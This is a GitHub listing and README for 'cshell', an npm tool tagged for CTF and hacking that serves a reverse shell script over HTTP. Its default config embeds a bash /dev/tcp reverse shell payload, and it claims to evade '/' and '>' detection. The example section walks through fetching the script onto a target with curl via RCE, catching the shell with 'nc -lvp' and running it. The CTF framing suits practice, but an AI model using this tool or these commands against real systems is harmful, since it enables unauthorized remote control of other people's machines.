https://github.com/cnily03/cshell
HTTP server for reverse shell downloading
https://github.com/cnily03/cshell
bash ctf ctf-tools hack reverse-shell shell
Last synced: about 2 months ago
JSON representation
HTTP server for reverse shell downloading
- Host: GitHub
- URL: https://github.com/cnily03/cshell
- Owner: Cnily03
- License: mit
- Created: 2023-03-04T17:16:38.000Z (over 3 years ago)
- Default Branch: master
- Last Pushed: 2024-03-17T14:14:23.000Z (over 2 years ago)
- Last Synced: 2024-10-18T09:30:43.850Z (over 1 year ago)
- Topics: bash, ctf, ctf-tools, hack, reverse-shell, shell
- Language: JavaScript
- Homepage: https://www.npmjs.com/package/cshell
- Size: 32.2 KB
- Stars: 0
- Watchers: 1
- Forks: 0
- Open Issues: 0
-
Metadata Files:
- Readme: README.md
- License: LICENSE
Awesome Lists containing this project
README
# CShell
This program could attach the file to the root path of the HTTP server.
## Superiority
- Bypass `/` and `>` detection and bounce the shell
- Use-friendly and highly customized cli tool
## Usage
### Quick Start
Run
```bash
npm i -g cshell
```
Use
```bash
cshell
```
For more help, please try `cshell --help`.
### From Source Code
Enter the source code directory. Install the dependencies.
```bash
npm ci
```
Install the cli tool globally.
```bash
npm link
```
Then you can directly use it on console every where. Try:
```bash
cshell
```
For more help, please try `cshell --help`.
### Configuration
It is recommended to initialize the config by running following command.
```bash
cshell-conf
```
`` refers to the config. Each KV is optional, and it will fallback to the default value.
Default config file is as followings.
```js
{
// http server to visit
"server-host": "127.0.0.1",
"server-port": 54180,
// master controller
"shell-host": "127.0.0.1",
"shell-port": 54188,
// static directory
"static": "",
// file path whose content is attached
"file": "",
// content type of the file
"content-type": "text/plain",
// which content if file is not specified
"default-file-content": "bash -i &> /dev/tcp/${{ env.shell_host }}/${{ env.shell_port }} 0>&1"
}
```
Note that `${{ something }}` in the file content will be replaced to corresponding values. Specially, `env` has following sub-values:
- `server_host`
- `server_port`
- `shell_port`
- `shell_port`
## Example
Run
```bash
cshell --host 12.34.56.78 --port 2020
```
Show
```plain
Server is running at port 2020...
- Try curl -o shell.sh 12.34.56.78:2020 on the target machine.
- Try nc -lvp 2020 on the master controller (12.34.56.78).
DO NOT forget to quit this process!!!
```
On the target machine to attack, run `curl -o shell.sh 12.34.56.78:2020` via RCE. On console displays `GET / FROM xx.xx.xx.xx`.
Then we press `Ctrl`+`C` to quit the program and run `nc -lvp 2020` on the master controller.
Attack the target machine by running `bash shell.sh` via RCE and we get the shell on the master controller.
## License
[MIT](https://mit-license.org)